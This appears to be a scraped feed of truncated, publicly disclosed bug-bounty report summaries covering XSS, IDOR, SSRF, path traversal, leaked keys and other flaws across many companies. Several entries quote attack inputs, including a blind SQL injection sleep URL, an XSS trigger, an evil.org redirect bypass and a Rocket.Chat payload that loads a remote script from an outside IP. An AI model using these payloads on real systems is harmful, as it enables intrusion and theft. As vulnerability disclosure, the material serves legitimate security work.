Mail.ru: REFLECTED XSS On http://jsgames.mail.ru/bad_browser.php via back_url paramter

Reflected XSS in jsgames.mail.ru via GET paramter...

Dropcontact: User can Subscribe a plan that is hidden by manipulating the value of "subscription" parameter at [ https://app.dropcontact.io/app/checkout/]

When login into dropcontact, going into subscription and clicking on some plan, you have the id of the plan in the url, someone could see hidden plan by changing this parameter...

Equifax-vdp: Open SonarQube instance leaking internal source code

Summary I came across an open SonarQube instance which can be found here: http://34.238.92.229:9000/ In this, there are 10 projects with a total of around 100k lines of code To identify the owner, I went to the Issues tab and expanded the list of authors. There were 29 people there, and many of...

Automattic: Reflected XSS on a Atavist theme

Summary: Hi team, I found Reflected XSS at a Atavist theme and there are a lot of affected websites. I don't know the theme's name but it's in use at https://magazine.atavist.com/ Just write alertdocument.domain to search field...

Shopify: staff can able to extend shopify trial period without admin permission

Description: my store 14 days trial subscription remains only for 2 days and I see Shopify also offers shop admin to extend shop trial period to another 14 days. so, I found an issue in which staff with no permission also able to extend trial period without admin permission steps to reproduce : -...

Rockset: S3 bucket data at http://rockset-support.s3-us-west-2.amazonaws.com/ reveals user addresses based on latitudes and longitudes.

At the s3 bucket located at http://rockset-support.s3-us-west-2.amazonaws.com/, a file was found called data.json.15that contains of interest latitudes and latitudes of user addresses. F930036 Steps to reproduce: 1, Download the file in the bucket with the command: aws s3 sync s3://rockset-suppor...

Acronis: ClickJacking

I have found the vulnerability called Clickjacking. Please find the details below: Description Clickjacking is an exploit in which malicious coding is hidden beneath apparently legitimate buttons or other clickable content on a website. OWASP Benchmark A6- Security Misconfiguration Steps to...

Dropcontact: Ngnix Server version disclosure.

Nginx Server version was returned by our server...

Courier: Bypass Too Many Requests Sign Up

Courier makes a rate limit check before allowing a user to register; this rate limit check can be bypassed and a user account can be created by sending a request directly to the AWS Cognito API – which is not rate limited...

GitLab: SafeParamsHelper::safe_params is not so safe

Summary GitLab uses SafeParamsHelper to filter out some keys before passing them to urlfor: ruby def safeparams if params.respondto?:permit! params.except:host, :port, :protocol.permit! else params end end The issue is that there are a lot more dangerous keys: ruby RESERVEDOPTIONS = :host,...

MTN Group: [mtn.com.af] Multiple vulnerabilities allow to Application level DoS

Issue Description Unauthenticated attackers can cause a denial of service resource consumption by using the large list of registered .js files from wp-includes/script-loader.php to construct a series of requests to load every file many times. The vulnerability is registered as CVE-2018-6389 76172...

Yelp: RCE on build server via misconfigured pip install

The following Python library has been installed on at least one Yelp owned build server directly from the public PyPI registry. https://pypi.org/project/yelp-cgeom/ This package should normally be downloaded from the internal Yelp registry, but a misconfiguration appears to have caused it to be...

Rockset: A member-member privilege could access the https://console.rockset.com/billing?tab=payment page even though the billing page is hidden from the menu.

Summary: I am writing to submit a vulnerability found at https://console.rockset.com/. I created an admin account with email [email protected] and added a member with email [email protected]. I logged in from the member's account and realized that the Billing page is n...

Lark Technologies: [IDOR] Modify other team's reminders via reminderId parameter

An IDOR Insecure Direct Object Reference vulnerability was found in Larksuite reminders, allowing an attacker to modify any other user's reminder in the POST request via "reminderId" parameter. We thank imrannisar for reporting this vulnerability and confirming its resolution...

TikTok: Cross Site Scripting using Email parameter in Ads endpoint 2

A cross site scripting vulnerability was found in an ads endpoint using the email parameter. This issue has been resolved. We thank @luizviana for reporting this to our team and confirming the resolution...

Shopify: Stored XSS in my staff name fired in another your internal panel

Hi all, I had lots of tests for bug bounty in my test store "trstore-3.myshopify.com" created about 4 years ago and then one of your developers noticed that a stored cross-site scripting payload in my staff name fired in another your internal panel. I have attached the email sent to me by your...

X (Formerly Twitter): Safe Redirect Bypass

Hello Team, Summary: The url below bypasses the safe redirect and redirects directly to the malicious website. http://evil.org/%00 The reason for this may be the fix in the report 921286. Steps: Tweet the url below: http://evil.org/%00 Thanks! @cyanpiny Impact The attacker can direct the victim...

Acronis: Arbitrary file creation via symlink attack on syncagentsrv (Acronis Sync Agent Service)

Issue class description Arbitrary file creation is a vulnerability that allows attacker to create file in arbitrary location within filesystem. This includes protected directories, such as C:\Windows, C:\windows\system32 and "C:\Program Files". If in addition, attacker has control over the file...

Acronis: Arbitrary DLL injection in mmsminisrv (Acronis Managed Machine Service Mini)

During initialization, mmsmini.exe service binary of mmsminisrv loads library C:\Program Files x86\Common Files\Acronis\Home\libssl10.dll. The library then tries to load non-existing file: C:\bshudson\workspace\mod-openssl-fips-win\205\product\out\standard\vs2013release\OpenSSL\ssl\openssl.cnf. T...

Mail.ru: NPM_API_KEY Leak

Sensitive application configuration data related to samokat.ru was leaked on github.com...

QIWI: CVE-2020-3187 - unauthenticated arbitrary file deletion in Cisco

Steps to reproduce: I could delete arbitrary files from https://79.142.21.220/ using CVE-2020-3187. POC video is attached. Browser/OS: Chrome/Windows ALSO Cisco ASA - Arbitary File Read - CVE-2020-3452 the file downloaded also attached here for poc Impact Impact: RCE is P1 critical vulnerability,...

Pornhub: XSS via JavaScript evaluation of an attacker controlled resource at www.pornhub.com

The researcher was able to execute arbitrary JavaScript code within the scope of the target domain by exploiting a reflected cross-site scripting vulnerability in a custom library...

Mail.ru: Forgot Password Page SMS Brute Force could lead to Account Takeover using Android/IOS app "About the house" via api.prodom.smart.space

Password recovery procedure was not sufficiently protected against bruteforce and allowed arbitrary smart.space account takeover...

GitHub Security Lab: Python : Add query to detect Server Side Template Injection

This bug was reported directly to GitHub Security Lab...

Internet Bug Bounty: Uncovering file quarantine and UX security issues in macOS apps ( .terminal, .fileloc and .url)

Slides : https://docs.google.com/presentation/d/19WeQbqcOKnrSv1I3Z4sm-oNAf6IVzHwRyQP4i9BvY/editslide=id.g758ad3e04223231 See Blogpost for more details - https://medium.com/@metnew/exploiting-popular-macos-apps-with-a-single-terminal-file-f6c2efdfedaa Summary Popular macOS apps with a file-sharing...

Rocket.Chat: Arbitrary file read in Rocket.Chat-Desktop

Description: Rocket.Chat-Desktop is vulnerable to arbitrary file read. Releases Affected: Rocket.Chat-Desktop-Client: v3.0.0-develop Steps To Reproduce by setting up a malicious server: 1. Go to Administration » Layout » Custom Scripts » Custom Script for Logged In Users 1. Insert the following...

Rocket.Chat: Remote Code Execution in Rocket.Chat-Desktop

Description: Rocket.Chat-Desktop is vulnerable to remote code execution. An attacker is able to create new BrowserWindow instances with a malicious preload script. Releases Affected: Rocket.Chat-Desktop-Client: PWNED', '', 'nodeIntegration=true', 'preload=\\45.155.173.235\data\cmd.js'.join','...

U.S. Dept Of Defense: [██████████.mil] Cisco VPN Service Path Traversal

Hi team. Summary The Cisco VPN Service at ██████.mil is vulnerable to the CVE-2020-3452 vulnerability, which allows path traversing within the web service's file system on the targeted device. Steps to Reproduce Make a GET request to: http...

Mail.ru: tmgame.mail.ru - Blind sql injection

https://tmgame.mail.ru/action.php?xml=1&acode=comein&buildtype=all&bldID=selectfromselectsleep20a&bldlocID=8 bldID уязвимый get-параметор. Impact Получение данных из бд...

Khan Academy: CSV Injection Via Student Password/Name Leads To Client Side RCE And Reading Client Files

Insufficient CSV escaping could result in our site generating an unsafe CSV file for an end user under certain conditions. See the reporter's summary for more. Two CSV Injection Issues Was Discovered On Khan's Teacher CSV Export Function, That Could Allow Client Site Remote Code Execution, And...

PlayStation: SOCK_RAW sockets reachable from Webkit process allows triggering double free in IP6_EXTHDR_CHECK

Summary Memory corruption can be achieved by sending fragmented IPv6 packets to loopback interface due to poor and inconsistent use of IP6EXTHDRCHECK. The macro IP6EXTHDRCHECK can free the mbuf if the packet is sent to loopback interface. This fact is not considered in dest6input, frag6input and...

Imgur: Stored XSS in Post title (PoC)

Hello, Stored XSS in Post title, example: https://imgur.com/gallery/Y5JUzv3, Thanks Impact steal cookies and session...

GSA Bounty: Denial of service via cache poisoning on https://www.data.gov/

An attacker can persistently block access to any on https://www.data.gov/ by using cache poisoning with the h0st headers to cause 502 response code。 To replicate: load https://www.data.gov/ in your browser. look the burp , add ?xyzxyz=1 as cache buster , and add h0st headers h0st: wrtqvavjigwdvoq...

GSA Bounty: Wordpress Users Disclosure (/wp-json/wp/v2/users/) on data.gov

Summary: Hello TTS Bug bounty team! I have found data.gov User/admin usernames disclosed. Using REST API, we can see all the WordPress users/author with some of their information. Steps To Reproduce: You can find the information disclosure by going to data.gov/wp-json/wp/v2/users/ Supporting Vide...

Mail.ru: Subdomain Takeover at analyticstest.geekbrains.ru

Unused analyticstest.geekbrains.ru subdomain was delegated to tilda.cc and not claimed...

Weblate: Open Github Repo Leaking WEBLATE SECRET KEY

Team, While going through Github search I discovered a public repository which contains Weblate Secret Key Issue & Poc: Repo: https://github.com/WeblateOrg File:https://github.com/WeblateOrg/weblate/blob/592472958f7b847701c51b36f4768b9784219fa1/weblate/settingsdocker.py SECRETKEY = os.environ.get...

Ruby on Rails: Server-side template injection at ujs test server

I have found in the server code for testing ujs in Rails that template injection is possible and that leads to rce. code https://github.com/rails/rails/blob/v6.0.3.2/actionview/test/ujs/server.rb ruby module UJS class Server Blade::Assets.environment get "/" = "testsindex" match "/echo" =...

New Relic: One Click Remote Code Injection - *.blog.newrelic.com

With some social engineering, a WordPress admin could be convinced to click a malicious link to abuse a vulnerability in a WordPress plugin. This could lead to script execution or even code execution on the host. Vulnerability: A CSRF vulnerability has been found inside the Admin Panel leading to...

Mail.ru: Information Disclosure

Domain, site, application www7.promo.plazius.ru Steps to reproduce 1. By nmap port scanning we know port 9049 is open 2. After that dirsearch Metrics are shown result open in browser. 3.Now open http://www7.promo.plazius.ru:9049/Metrics Here you will get internal metrics of system Impact This is...

Kubernetes: SSRF for kube-apiserver cloudprovider scene

Report Submission Form Summary: attacker can create admissionwebhook cause ssrf in cloudprovider server. cloudprovider like GKE AKS EKS. Kubernetes Version: kubernetes v1.18.6 Component Version: Docker version 19.03.6, build 369ce74a3c Steps To Reproduce: 1. use follwing command create v1.18.6...

U.S. Dept Of Defense: https://█████ is vulnerable to CVE-2020-3452 Read-Only Path Traversal Vulnerability

Summary: https://████████ is vulnerable to a Read-Only Path Traversal Vulnerability Description: Get request parameters at the /+CSCOT+/translation-table and the /+CSCOT+/oem-customization are not properly sanitized which allows for reading files within the webroot directory that are not intended...

TikTok: Open Redirect Vulnerability on TikTok Ads Portal

An Open Redirect vulnerability was found that could expose the user session cookie potentially allowing an attacker to obtain access to an account on the TikTok ads portal...

Mail.ru: cross site scripting bypass session

Reflected XSS in cloud.mail.ru via cookie value...

IBM: CVE-2020-3452 Cisco ASA / Firepower Read-Only Path Traversal Vulnerability - https://esccvc.de.ibm.com

A vulnerability in the interface of Cisco Adaptive Security Appliance and Cisco Firepower Threat Defense FTD was reported to IBM, analyzed and have been remediated. Thank you to Khaled 0xelkomy...

lemlist: CVE-2019-19935 - DOM based XSS in the froala editor

Summary: A stored XSS flow exist in the froala editor used in the web application. This can be trigger by using the code view of the editor Steps To Reproduce: 1. Start a new campaign 2. fill all the fieds and choose blank email template for the message 3. Switch to code editor view and inject "...

Mail.ru: Information Disclosure on www7.promo.plazius.ru

Performance metrics were available at www7.promo.plazius.ru...

Mail.ru: Information Disclosure on qa-delivery-srv.plazius.ru

Performance metrics were available at qa-delivery-srv.plazius.ru...

Zomato: Availing Zomato gold by using a random third-party `wallet_id`

We received a report from @pandaaaa wherein he demonstrated a way to avail Zomato Gold membership using random Zomato User's wallet. The report was triaged and rewarded with critical severity with a CVSS score of 9.3. It was considered critical since a random user's wallet could have been used fo...

lemlist: app.lemlist.com : Admin Panel Access

hi team, Steps To Reproduce: While doing some analyse for javascript files in app.lemlist.com i found interesting endpoints . is the admin panal and is not protected , any normal user can access the panel . Steps To Reproduce: Add details for how we can reproduce the issue 1. Log into your accoun...

Mail.ru: Improper Restriction of Excessive Authentication Attempts at http://terrafoot.ru/login.php (Rate Limit bypass via IP Rotation)

Password at terrafoot.ru was not sufficiently protected against bruteforce...